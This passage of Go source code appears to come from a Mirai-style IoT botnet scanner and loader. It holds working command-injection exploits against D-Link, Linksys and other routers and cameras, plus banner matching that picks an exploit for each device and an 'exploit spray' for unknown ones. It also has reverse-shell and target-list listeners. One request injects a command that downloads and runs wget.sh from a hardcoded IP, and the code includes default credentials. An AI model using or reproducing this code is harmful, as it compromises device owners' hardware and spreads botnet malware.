    conn.Write([]byte("POST /debug.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: python-requests/2.21.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic R2VtdGVrOmdlbXRla3N3ZA==\r\n\r\ndata1=" + linksysTwoPayload + "&command=ui_debug\r\n\r\n"))

    tmpbuf := make([]byte, 128)
    ln, err := conn.Read(tmpbuf)
    if ln <= 0 || err != nil {
        conn.Close()
    }

    zeroByte(rdbuf)
    conn.Close()
}

func infectFunctionDlinkTwo(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }
 	
 	var cntLen int = 91
 	cntLen += len(dlinkTwoPayload)

    conn.Write([]byte("POST /setSystemCommand HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nAuthorization: Basic YWRtaW46\r\n\r\nReplySuccessPage=docmd.htm&ReplyErrorPage=docmd.htm&SystemCommand=" + dlinkTwoPayload + "&ConfigSystemCommand=Save\r\n\r\n"))

    tmpbuf := make([]byte, 128)
    ln, err := conn.Read(tmpbuf)
    if ln <= 0 || err != nil {
        conn.Close()
    }

    zeroByte(rdbuf)
    conn.Close()
}

func infectFunctionDlinkThree(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }
 	
 	var cntLen int = 20
 	cntLen += len(dlinkTwoPayload)

    conn.Write([]byte("POST /diagnostic.php HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\n\r\nact=ping&dst=%26 " + dlinkTwoPayload + "%26\r\n\r\n"))
    
    tmpbuf := make([]byte, 128)
    ln, err := conn.Read(tmpbuf)
    if ln <= 0 || err != nil {
        conn.Close()
    }

    zeroByte(rdbuf)
    conn.Close()
}

func infectFunctionDlinkFour(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }
 	
    conn.Write([]byte("GET /cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;" + dlinkTwoPayload +";echo%207yeB8BQB2ycGRCT8LmsmttUWPggWykhK; HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n"))
    
    tmpbuf := make([]byte, 128)
    ln, err := conn.Read(tmpbuf)
    if ln <= 0 || err != nil {
        conn.Close()
    }

    zeroByte(rdbuf)
    conn.Close()
}

func infectFunctionDlinkFive(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }
 	
    conn.Write([]byte("GET /login.cgi?cli=multilingual%20show';" + dlinkTwoPayload + "'$ HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n"))
    
    tmpbuf := make([]byte, 128)
    ln, err := conn.Read(tmpbuf)
    if ln <= 0 || err != nil {
        conn.Close()
    }

    zeroByte(rdbuf)
    conn.Close()
}

func infectFunctionDlinkSix(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }
 	
    conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nCookie: i=`" + dlinkTwoPayload + "`\r\n\r\n"))
    
    tmpbuf := make([]byte, 128)
    ln, err := conn.Read(tmpbuf)
    if ln <= 0 || err != nil {
        conn.Close()
    }

    zeroByte(rdbuf)
    conn.Close()
}

func infectFunctionDlinkSeven(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }
 	
    conn.Write([]byte("POST /hedwig.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: uid=uAMwOEeRuqDZptt4JHrQuakNv2g3eR9kqnvDUvAkaRD561YFVty3uXFAls6bcARYA5w5KpUrDlY7pdAXuG0AuhHSfBCQJoPDqxdjszcAWwQYxOEf6Sy9t8iU4PV1xNyVxDMPqZwR7a5dthsW8jLiK0ha1qUksjWYna5IaYoOYIM7aiT3mrseuskJWVONKXFQQw64tNsAAmrfIc9OobZ4gxQibsOsHkZoqz5C1ScGYmMaWeICXuF1J2R1FIzGkXOr3OXjKXQ8C6ZeSbRRmEBF8GaJPJ87wiVlDAXj6QsyKSWDzjqTWqS9rxBnx39xwO9e02kJibbjxAW93SsX7rfKmUH4hN0H1j8dqYGhpPWL0CSELCM7NwWSjs5ofrkRivAE5bI3rnlSsMeyvPGmRjGhSH6Z5kWDAVQ5bUztFAALVyl0nPl9fl2FgmLNCPmqx9VMNMsFTnOfv4hVP9wNiN1WYTeHRCrLeB9THv1uzipH8utX2Y7Cv5iaxSMYZOUVG2puqPAYc2QzfdkEgrIOuIOZIUXQvYGF35rIkMW8eYuiVKqejKbXaM8B6RfiBTCTAHJpRMnkp5L9HorqZNwX6lpyH62slJG4iS3Yz31SrgBV5PDANkFw92G6qtT8kvbHfzoI2kyJKQa67TSDHhZLgfUHMsFFLwZTZwiXlZIzDFimYbdTaz8KWF0POFoqyGs5oynMDic8VvwS2rGsALvVHYWa885i4CIrwyEOnkY6Mqvmv96osjP1Br3GWARZPpnwGoWc7dVLvZVDLW1ObRFg1bX8qDUdxv4jcGGwZdK5wz2bJoNoyEWIkFVcQldDxjaQNdokjCmJxoEGRUGYyZshnx1fYqLH3Mc3K9DcB7xhZdbdBAohXpzYr7OXpTFHZp7THrBE1i8VvvoaF1bBXsBrasf4fwYtVUrtgPHVnlq1oN2uoO6qfLZLz49u1QxK6qBGsQG2pJa6rxYmcHEPt���*vk3aG0Vgy2692qgW�ٰ*crxdla7qucxf�ذ*qzoFOTyzL063ZRDecd /tmp;wget http://37.0.11.220/a/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh;\r\nContent-Length: 15\r\n\r\nL0PTJUj=NX9zke5\r\n\r\n"))
    
    tmpbuf := make([]byte, 128)
    ln, err := conn.Read(tmpbuf)
    if ln <= 0 || err != nil {
        conn.Close()
    }

    zeroByte(rdbuf)
    conn.Close()
}

func infectFunctionDlinkEight(target string) {

    var rdbuf []byte = []byte("")
 
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
    if err != nil {
        return
    }
 	
    conn.Write([]byte("POST /HNAP1/ HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nSOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && " + dlinkThreePayload + "`\"\r\nContent-Length: 0\r\n\r\n"))
    
    tmpbuf := make([]byte, 128)
    ln, err := conn.Read(tmpbuf)
    if ln <= 0 || err != nil {
        conn.Close()
    }

    zeroByte(rdbuf)
    conn.Close()
}


func scannerAddExploit(name string, function interface{}) {

    exploitMap[name] = function
}

func scannerInitExploits() {

    exploitMap = make(map[string]interface{})

    scannerAddExploit("Basic realm=\"DVR\"", infectFunctionLilinDvr)
    scannerAddExploit("uc-httpd 1.0.0", infectFunctionUchttpd)
    scannerAddExploit("AuthInfo:", infectFunctionTvt)
    scannerAddExploit("CMS Web Viewer", infectFunctionMagic)
    scannerAddExploit("Server: GoAhead-Webs", infectFunctionFiberhome)
    scannerAddExploit("Server: DWS", infectFunctionVigor)
    scannerAddExploit("Basic realm=\"Broadband Router\"", infectFunctionComtrend)
    scannerAddExploit("Basic realm=\"Broadband Router\"", infectFunctionBroadcom)
    scannerAddExploit("Server: Boa/0.93.15", infectFunctionGponFiber)
    scannerAddExploit("TOTOLINK", infectFunctionTotolink)
    scannerAddExploit("Server: Boa/0.94.14", infectFunctionRealtek)
    scannerAddExploit("Basic realm=\"Server Status\"", infectFunctionHongdian)
    scannerAddExploit("Server: Http Server", infectFunctionTenda)
    scannerAddExploit(",/playzone,/", infectFunctionZyxel)
    scannerAddExploit("Linksys E", infectFunctionLinksys)

    // Exploit spray for devices we cant identify
    scannerAddExploit("HTTP/1.", infectFunctionAlcatel)
    scannerAddExploit("HTTP/1.", infectFunctionZyxelTwo)
    scannerAddExploit("HTTP/1.", infectFunctionZte)
    scannerAddExploit("HTTP/1.", infectFunctionNetgear)
    scannerAddExploit("HTTP/1.", infectFunctionNetgearTwo)
    scannerAddExploit("HTTP/1.", infectFunctionNetgearThree)
    scannerAddExploit("HTTP/1.", infectFunctionNetgearFour)
    scannerAddExploit("HTTP/1.", infectFunctionGponOG)
    scannerAddExploit("HTTP/1.", infectFunctionLinksysTwo)
    scannerAddExploit("HTTP/1.", infectFunctionLinksysThree)
    scannerAddExploit("HTTP/1.", infectFunctionDlink)
    scannerAddExploit("HTTP/1.", infectFunctionDlinkTwo)
    scannerAddExploit("HTTP/1.", infectFunctionDlinkThree)
    scannerAddExploit("HTTP/1.", infectFunctionDlinkFour)
    scannerAddExploit("HTTP/1.", infectFunctionDlinkFive)
    scannerAddExploit("HTTP/1.", infectFunctionDlinkSix)
    scannerAddExploit("HTTP/1.", infectFunctionDlinkSeven)
    scannerAddExploit("HTTP/1.", infectFunctionDlinkEight)
    
}

func httpBannerCheck(target string) {

    conn, err := net.DialTimeout("tcp", target, netTimeout * time.Second)
    if err != nil {
        workerGroup.Done()
        return
    }

    conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\n\r\n"))

    for {
        bytebuf := make([]byte, 2048)
        l, err := conn.Read(bytebuf)
        if err != nil || l <= 0 {
            zeroByte(bytebuf)
            conn.Close()
            workerGroup.Done()
            return
        }

        for key, element := range exploitMap {
            if strings.Contains(string(bytebuf), key) {
                switch function := element.(type) {
                    case func(string):
                        function(target)
                    default:
                        break
                }
            }
        }
    }

    workerGroup.Done()
    return
}

func main() {

    go func() {
    	i := 0
    	for {
    		fmt.Printf("%d's | Payload Sent: %d | Telnet Opened: %d\r\n", i, payloadSent, telShells)
    		time.Sleep(1 * time.Second)
    		i++
    	}
    } ()

    dropperMap = make(map[string]echoDropper)
    telnetLoadDroppers()
    scannerInitExploits()

    li, err := net.Listen("tcp", "0.0.0.0:" + strconv.Itoa(ucRshellPort))
	if err != nil {
		return
	}

    recvServ, err := net.Listen("tcp", "0.0.0.0:19412")
	if err != nil {
		return
	}

	go func() {
		for {
			conn, err := li.Accept()
			if err != nil {
				break
			}

			go reverseShellUchttpdLoader(conn)
		}
	} ()

	go func() {
		for {
			conn, err := recvServ.Accept()
			if err != nil {
				break
			}

			for {
				buf := make([]byte, 32)
				l, err := conn.Read(buf)
				if l <= 0 || err != nil {
					conn.Close()
					break
				}

                workerGroup.Add(1)
	    	    go httpBannerCheck(string(buf))
			}
		}
	} ()

    for {
        reader := bufio.NewReader(os.Stdin)
	    input := bufio.NewScanner(reader)

	    for input.Scan() {
            if os.Args[1] == "listen" {
                workerGroup.Add(1)
	    	    go httpBannerCheck(input.Text())
            } else {
                workerGroup.Add(1)
                go httpBannerCheck(input.Text() + ":" + os.Args[1])
            }
	    }
    }
}